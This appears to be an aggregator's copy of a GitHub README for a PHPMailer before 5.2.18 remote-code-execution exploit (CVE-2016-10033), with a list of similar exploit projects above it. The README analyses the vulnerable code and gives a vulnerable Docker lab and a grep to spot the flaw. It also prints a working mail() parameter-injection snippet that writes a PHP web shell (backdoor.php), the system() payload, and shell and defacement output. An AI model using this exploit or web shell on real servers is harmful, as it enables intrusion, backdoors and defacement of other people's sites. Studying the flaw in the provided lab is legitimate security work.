All Projects → opsxcq → Exploit Cve 2016 10033

opsxcq / Exploit Cve 2016 10033

Licence: gpl-3.0
PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container

Projects that are alternatives of or similar to Exploit Cve 2016 10033

Pwn2exploit
all mine papers, pwn & exploit
Stars: ✭ 289 (-18.82%)
Mutual labels:  exploit
Armpwn
Repository to train/learn memory corruption on the ARM platform.
Stars: ✭ 320 (-10.11%)
Mutual labels:  exploit
Linux Kernel Exploitation
A collection of links related to Linux kernel security and exploitation
Stars: ✭ 3,859 (+983.99%)
Mutual labels:  exploit
Vbscan
OWASP VBScan is a Black Box vBulletin Vulnerability Scanner
Stars: ✭ 295 (-17.13%)
Mutual labels:  exploit
Pwn2own2020
Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities
Stars: ✭ 314 (-11.8%)
Mutual labels:  exploit
Iblessing
iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining.
Stars: ✭ 326 (-8.43%)
Mutual labels:  exploit
Cve 2017 11882
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.
Stars: ✭ 280 (-21.35%)
Mutual labels:  exploit
Iot Vulhub
IoT 固件漏洞复现环境
Stars: ✭ 341 (-4.21%)
Mutual labels:  exploit
Wordpress Xmlrpc Brute Force Exploit
Wordpress XMLRPC System Multicall Brute Force Exploit (0day) by 1N3 @ CrowdShield
Stars: ✭ 315 (-11.52%)
Mutual labels:  exploit
Gtfo
Search gtfobins and lolbas files from your terminal
Stars: ✭ 336 (-5.62%)
Mutual labels:  exploit
Nginx Lua Anti Ddos
A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect yourself from every attack type All Layer 7 Attacks Mitigating Historic Attacks DoS DoS Implications DDoS All Brute Force Attacks Zero day exploits Social Engineering Rainbow Tables Password Cracking Tools Password Lists Dictionary Attacks Time Delay Any Hosting Provider Any CMS or Custom Website Unlimited Attempt Frequency Search Attacks HTTP Basic Authentication HTTP Digest Authentication HTML Form Based Authentication Mask Attacks Rule-Based Search Attacks Combinator Attacks Botnet Attacks Unauthorized IPs IP Whitelisting Bruter THC Hydra John the Ripper Brutus Ophcrack unauthorized logins Injection Broken Authentication and Session Management Sensitive Data Exposure XML External Entities (XXE) Broken Access Control Security Misconfiguration Cross-Site Scripting (XSS) Insecure Deserialization Using Components with Known Vulnerabilities Insufficient Logging & Monitoring Drupal WordPress Joomla Flash Magento PHP Plone WHMCS Atlassian Products malicious traffic Adult video script avs KVS Kernel Video Sharing Clip Bucket Tube sites Content Management Systems Social networks scripts backends proxy proxies PHP Python Porn sites xxx adult gaming networks servers sites forums vbulletin phpbb mybb smf simple machines forum xenforo web hosting video streaming buffering ldap upstream downstream download upload rtmp vod video over dl hls dash hds mss livestream drm mp4 mp3 swf css js html php python sex m3u zip rar archive compressed mitigation code source sourcecode chan 4chan 4chan.org 8chan.net 8ch 8ch.net infinite chan 8kun 8kun.net anonymous anon tor services .onion torproject.org nginx.org nginx.com openresty.org darknet dark net deepweb deep web darkweb dark web mirror vpn reddit reddit.com adobe flash hackthissite.org dreamhack hack hacked hacking hacker hackers hackerz hackz hacks code coding script scripting scripter source leaks leaked leaking cve vulnerability great firewall china america japan russia .gov government http1 http2 http3 quic q3 litespeedtech litespeed apache torrents torrent torrenting webtorrent bittorrent bitorrent bit-torrent cyberlocker cyberlockers cyber locker cyberbunker warez keygen key generator free irc internet relay chat peer-to-peer p2p cryptocurrency crypto bitcoin miner browser xmr monero coinhive coin hive coin-hive litecoin ethereum cpu cycles popads pop-ads advert advertisement networks banner ads protect ovh blazingfast.io amazon steampowered valve store.steampowered.com steamcommunity thepiratebay lulzsec antisec xhamster pornhub porn.com pornhub.com xhamster.com xvideos xvdideos.com xnxx xnxx.com popads popcash cpm ppc
Stars: ✭ 295 (-17.13%)
Mutual labels:  exploit
Struts Pwn cve 2018 11776
An exploit for Apache Struts CVE-2018-11776
Stars: ✭ 300 (-15.73%)
Mutual labels:  exploit
Cve 2018 7600
💀Proof-of-Concept for CVE-2018-7600 Drupal SA-CORE-2018-002
Stars: ✭ 330 (-7.3%)
Mutual labels:  exploit
Android Exploits
A collection of android Exploits and Hacks
Stars: ✭ 290 (-18.54%)
Mutual labels:  exploit
Androrat
AndroRAT | Remote Administrator Tool for Android OS Hacking
Stars: ✭ 340 (-4.49%)
Mutual labels:  exploit
Traitor
⬆️ ☠️ Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, polkit, docker socket
Stars: ✭ 3,473 (+875.56%)
Mutual labels:  exploit
Sireprat
Remote Command Execution as SYSTEM on Windows IoT Core (releases available for Python2.7 & Python3)
Stars: ✭ 326 (-8.43%)
Mutual labels:  exploit
Cve 2019 0708
3389远程桌面代码执行漏洞CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
Stars: ✭ 350 (-1.69%)
Mutual labels:  exploit
Bug Project Framework
漏洞利用框架模块分享仓库
Stars: ✭ 343 (-3.65%)
Mutual labels:  exploit
Jsshell
An interactive multi-user web JS shell
Stars: ✭ 330 (-7.3%)
Mutual labels:  exploit

PHPMailer < 5.2.18 Remote Code Execution

Docker Pulls License

PHPMailer is the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily. Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more

PHPMailer before its version 5.2.18 suffer from a vulnerability that could lead to remote code execution (RCE). The mailSend function in the isMail transport in PHPMailer, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted From address.

Vulnerable environment

To setup a vulnerable environment for your test you will need Docker installed, and just run the following command:

docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033

And it will spawn a vulnerable web application on your host on 8080 port

vulnerable

Exploit

To exploit this target just run:

./exploit host:port

If you are using this vulnerable image, you can just run:

./exploit localhost:8080

After the exploitation, a file called backdoor.php will be stored on the root folder of the web directory. And the exploit will drop you a shell where you can send commands to the backdoor:

./exploit.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> 

And that's it, you have your shell. There is another exploit, which ilustrates another use case.

./deface.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Placing your message in the server
[+] Job done, exiting

And if you visit the page again, you will see this:

defaced

Vulnerable code

Before this commit in class.phpmailer.php in a certain scenario there is no filter in the sender's email address special chars. This flaw can lead to a remote code execution, via mail function here.

Analysing the code, there is no filter in mailSend() function

        $params = null;
        //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver
        if (!empty($this->Sender)) {
            $params = sprintf('-f%s', $this->Sender);
        }

$this->Sender is directly appended to $params variable, which was filtered in validateAddress() function, but as it uses RFC 3696 specification, it allow certain characters which will break things. In this case, quotes:

In addition to quoting using the backslash character, conventional double-quote characters may be used to surround strings. For example

"[email protected]"@example.com

"Fred Bloggs"@example.com

are alternate forms of the first two examples above. These quoted forms are rarely recommended, and are uncommon in practice, but, as discussed above, must be supported by applications that are processing email addresses. In particular, the quoted forms often appear in the context of addresses associated with transitions from other systems and contexts; those transitional requirements do still arise and, since a system that accepts a user-provided email address cannot "know" whether that address is associated with a legacy system, the address forms must be accepted and passed into the email environment.

You can read the whole RFC here if you want. But also, if PHP version is inferior to 5.2.0, and there is no PCRE installed, $patternselect variable in validateAddress() will be set to noregex. It will cause the input will be able to avoid any regex check. It will only pass through a small verification:

            case 'noregex':
                //No PCRE! Do something _very_ approximate!
                //Check the address is 3 chars or longer and contains an @ that's not the first or last char
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);

Then, the code flow goes to mailPassthru() function, which, if running in safe_mode won't be vulnerable to this flaw, as the following code states it

        //Can't use additional_parameters in safe_mode
        //@link http://php.net/manual/en/function.mail.php
        if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }

But, if it isn't running in safe_mode, then our special parameter will be passed to mail() and, if we were lucky, it will get our file containing whatever we want to be written where we choose it to be wrote to.

Notes about PHP mail() function exploitation

The exploitation of PHP mail() function isn't a new thing, but it still alive and people still using it. To explain how it works, lets look at how mail() function is defined:

bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

There are several exploitation methods for different results, we will focus on the exploitation of the 5th parameter to get Remote Code Execution (RCE). The parameter $additional_parameters is used to pass additional flags as command line options to the program configured to send the email. This configuration is defined by the sendmail_path variable.

A security note from php official documentation:

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmiail option.

This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.

Considering the additional parameters that can be injectected we will use -X to exploit this flaw. More about the -X parameter

-X logfile
Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.

There are also some other interesting parameters that you should know that exist:

-Cfile
Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.

And

-O option=value
Set option option to the specified value. This form uses long names.

And for -O option, the QueueDirectory is the most interesting option there, this option select the directory in which to queue messages.

If you want to read the whole list of parameters and options, just man sendmail or read it online here

Based on this information, and the hability to control at least one of the other parameters, we can exploit the host. Bellow the steps for a successful exploitation:

  • Control $additional_parameters and another mail() parameter
  • Know a writeable diretory on target host which is accessible via the target system and user (www-data for example). Usually this directory can be anything bellow webroot (aka /var/www/html for another systems, /www for this example)
  • Any PHP payload that you want, we are using a simple system() payload in this example, with a spice of base64 and some special characters | to make it easier to parse.
  • Just assembly everything together !

Remember that the -X option will write the log file, that will contain among the log information your PHP payload, in the directory that you will inform. An example of a vulnerable PHP code:

$to = '[email protected]';
$subject = '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>';
$message = 'Pwned';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/www/backdoor.php';
mail($to, $subject, $message, $headers, $options);

If you execute the code above, it will create a log file in the /www/backdoor.php, this is the essence of this exploit.

Payload

Bellow the payload used in this example

<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>

I wanna chase bugs, now what ?

Want a easy, one command, way to try to spot this flaw ? Remind this magic grep command !

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *

Running it against this repository will result in

src/class.phpmailer.php:700:            $result = @mail($to, $subject, $body, $header, $params);

Credits

This vulnerability was found by Dawid Golunski.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (opsxcq) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].